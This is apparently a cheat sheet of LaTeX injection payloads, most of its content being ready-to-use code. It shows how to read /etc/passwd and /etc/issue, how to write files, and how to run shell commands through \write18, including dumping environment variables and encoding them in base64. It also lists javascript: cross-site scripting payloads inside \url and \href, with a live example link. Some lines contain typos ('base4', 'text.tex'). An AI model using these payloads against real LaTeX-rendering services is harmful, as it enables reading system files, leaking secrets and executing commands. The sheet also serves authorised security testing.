Read file
1
2
| \input{/etc/passwd}
\include{password} # load .tex file
|
Read single lined file
1
2
3
4
5
| \newread\file
\openin\file=/etc/issue
\read\file to\line
\text{\line}
\closein\file
|
Read multiple lined file
1
2
3
4
5
6
7
| \newread\file
\openin\file=/etc/passwd
\loop\unless\ifeof\file
\read\file to\fileline
\text{\fileline}
\repeat
\closein\file
|
Read text file, keep the formatting
1
2
| \usepackage{verbatim}
\verbatiminput{/etc/passwd}
|
Write file
1
2
3
4
| \newwrite\outfile
\openout\outfile=cmd.tex
\write\outfile{Hello-world}
\closeout\outfile
|
Command execution
The input of the command will be redirected to stdin, use a temp file to get it.
1
2
| \immediate\write18{env > output}
\input{output}
|
If you get any LaTex error, consider using base64 to get the result without bad characters
1
2
| \immediate\write18{env | base64 > test.tex}
\input{text.tex}
|
1
2
| \input|ls|base4
\input{|"/bin/hostname"}
|
Cross Site Scripting
From @EdOverflow
1
2
| \url{javascript:alert(1)}
\href{javascript:alert(1)}{placeholder}
|
Live example at http://payontriage.com/xss.php?xss=$\href{javascript:alert(1)}{Frogs%20find%20bugs}$
References
